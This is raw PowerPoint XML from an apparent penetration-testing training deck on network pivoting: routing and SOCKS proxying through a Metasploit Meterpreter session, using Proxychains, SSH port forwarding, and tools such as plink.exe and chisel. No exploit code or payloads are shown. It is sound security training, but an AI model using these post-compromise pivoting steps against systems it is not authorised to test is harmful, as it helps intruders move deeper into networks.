            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CB4DE48-5094-4520-A26C-AFC2718D4505}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1366879" y="5236087"/>
            <a:ext cx="9575440" cy="812039"/>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4CA69412-BFE8-43B1-BBEE-CEF83BE6420F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="405564" y="3533313"/>
            <a:ext cx="11498071" cy="1489188"/>
            <a:chOff x="405564" y="3533313"/>
            <a:chExt cx="11498071" cy="1489188"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Picture 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE493787-7C57-4BCE-96A7-7B7D6E217AC3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId2"/>
            <a:srcRect r="51977" b="69410"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="543792" y="4005695"/>
              <a:ext cx="4962565" cy="561813"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Arrow: Right 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B02AFAE9-B8A1-4162-A994-E6103F77CD5A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5807635" y="3971326"/>
              <a:ext cx="1108364" cy="632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A9153506-F555-43FD-A344-DCCFC5F0B98D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="405564" y="3533313"/>
              <a:ext cx="11498071" cy="1489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pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03E6404D-A849-4FD9-B5E9-937672FD0C75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1518824" y="5324351"/>
            <a:ext cx="9296400" cy="600075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9F1D146-9435-4BED-B214-26C20CE3F52B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7294015" y="3666115"/>
            <a:ext cx="4354193" cy="1240972"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Straight Connector 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF7E4C8B-528F-4988-ACDA-1E27F6AEEA63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8953130" y="4040932"/>
            <a:ext cx="3417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DC2BBA-CE8F-47B7-8FEB-D5CA389BBE7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9195049" y="5551616"/>
            <a:ext cx="3417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FFE7A16-CABD-4F1D-BA89-24C1F8BA0E48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9124025" y="4040932"/>
            <a:ext cx="233039" cy="12834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6901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438229-B201-4CD7-AF6E-5F48938A9F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C4A4AAE-41AF-4E4C-A172-584AEC7EEF50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Easy Mode: Metasploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{814D15DD-6EDD-496E-9D5F-516C07BE4D61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Metasploit sessions can be used as proxies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Setup: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Get a session (I chose Meterpreter) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Background the session to access other modules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Next steps:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>multi/manage/autoroute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>to add other network routes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>auxiliary/server/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>socks_proxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>to set up a SOCKS proxy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31820867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F304F8-8FDF-4CEB-B78B-BBA084DBF4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15AC76C-C8FD-4B99-AC1A-A23070036591}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Autoroute</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4849C001-1771-4E30-BBD1-A9A054079FBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="2095603"/>
            <a:ext cx="10424160" cy="2666794"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F26C8C34-BC05-444C-9B06-AA4F8A8DA95D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4734509" y="2065123"/>
            <a:ext cx="1544372" cy="291997"/>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98E55437-3E98-4897-9866-3EBC9365F29E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3719744" y="3880004"/>
            <a:ext cx="5586815" cy="291997"/>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612153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D2A515-F7BE-4C14-BEB5-A6CF0711A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2AA9703-28AA-4AB1-806F-0061A30F4C8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Proxy Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44AACF15-8F5E-4364-B3B6-5F7C6E52EB47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3323888" y="1179515"/>
            <a:ext cx="7932584" cy="4956170"/>
            <a:chOff x="3323888" y="1179515"/>
            <a:chExt cx="7932584" cy="4956170"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Picture 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{001DAFF9-F96F-4767-B130-67D2A59E1C31}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3323888" y="1179515"/>
              <a:ext cx="7932584" cy="4956170"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Rectangle 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFC35CFA-FA6E-4EF1-BBA7-62C70AD6432B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3505149" y="3283001"/>
              <a:ext cx="1544372" cy="291997"/>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8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC6862FD-D98C-4860-8444-04B8F96402F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2777346"/>
            <a:ext cx="29667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Make sure these options match what you put in the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Proxychains</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 config</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A825B5F-A0C1-4D94-B099-A6FA19957110}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3505149" y="2957174"/>
            <a:ext cx="1544372" cy="19655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96629A9E-ECC2-48CC-B5B1-1BC3A46CEAF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6827468" y="5222241"/>
            <a:ext cx="1615491" cy="32379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8D1F68D3-B142-439A-AF83-694BF9073B61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7210687" y="5675889"/>
            <a:ext cx="273189" cy="25439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36840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AA31A7-228B-4BF3-9707-77A52FB714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81E29ED-070D-44BF-A1D1-4FA1AABF6B8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Running via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Proxychains</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E94CFA56-3AEE-4408-B35E-D8A82E9E07C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1599757" y="3721808"/>
            <a:ext cx="9261283" cy="2383265"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{222D987D-D00C-4CC4-9981-5816B5B2C892}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1477837" y="2997200"/>
            <a:ext cx="747203"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pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32452439-95D7-47D2-BE8A-AD41B3A85DA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1599757" y="1149606"/>
            <a:ext cx="9258300" cy="2276475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CDD1D1C-8878-46B3-A854-3AFF829B6B9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8172886" y="1311300"/>
            <a:ext cx="1834714" cy="354939"/>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673B472-039E-4A51-BCD0-FF421F345071}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1599757" y="5247041"/>
            <a:ext cx="625283" cy="355949"/>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5255D470-11AC-4C86-A564-3C1F46F1AEB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7624246" y="3071142"/>
            <a:ext cx="2220794" cy="354939"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">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F3EFF4A-FF13-41A7-A9D2-04FE51A8315B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5311550" y="3071141"/>
            <a:ext cx="1658210" cy="354939"/>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8680176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09EB83-A710-423E-860F-145CBCFBFA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01ACEC5-4681-4F5B-AF03-8A781301DF81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Wrap Up</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{288525F8-D0AA-466B-801B-AB473DF5A15B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1371600"/>
            <a:ext cx="6969760" cy="4744720"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>If you don’t understand this… it’s ok</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Might take several reads and refreshers over time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>SSH Port Forwarding is powerful</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Local, Remote, Dynamic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you can SSH to target, think </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>local or dynamic</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you can SSH to Kali, think </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>remote</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>If SSH is missing, you still have options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>plink.exe, chisel, Metasploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2DD9DDD-200D-4056-A3AD-A9944DEC3000}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7826906" y="1691640"/>
            <a:ext cx="3951514" cy="3931920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16686953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lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t>Questions?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6271477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7CF2A8B-8673-424E-A595-B96F7DD54743}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>(this session was written by Brandon Deluca with review by Brent)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
